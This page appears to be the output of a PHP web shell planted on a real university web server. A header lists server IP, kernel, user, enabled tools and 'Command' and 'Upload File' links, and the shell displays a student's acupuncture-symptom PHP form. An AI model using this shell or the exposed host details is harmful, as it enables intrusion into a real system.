Server IP : 172.16.15.8 / Your IP : 3.21.159.223 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/rlbarner/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); $error = $_SESSION['error']; if ($error != NULL) { print "<FONT COLOR=RED>$error</FONT><br>"; $_SESSION['error'] = NULL; } ?> <HEAD><link rel="stylesheet" type="text/css" href="Styles.css"></head> <TITLE>AcuPoint</TITLE> <H1>Accupuncture Pin-Pointing Trouble Location Finder</H1> <HR> <h2>Below you will see general areas and common problems. <BR>Please select all that currently apply to your problem at hand.</H2> <b>General Pain Areas</b> <FORM ACTION=Location.php METHOD=POST> <?php $areas = array("Headaches or Migraine", "Local Pain", "Cold and Flu", "Nervous System", "Cardiovascular", "Abdominal Discomfort", "Women Only", "Urinary Problems", "Other"); for ($i = 0; $i < count($areas); $i++) { print "<input type=checkbox name=prefer[] value=$i> $areas[$i]<br>"; } ?> <br><INPUT TYPE=SUBMIT VALUE=Submit> <INPUT TYPE=RESET VALUE=Reset> <BR><BR> <BR><A HREF=AcuFront.html> Home Screen </A> </BODY> </HTML>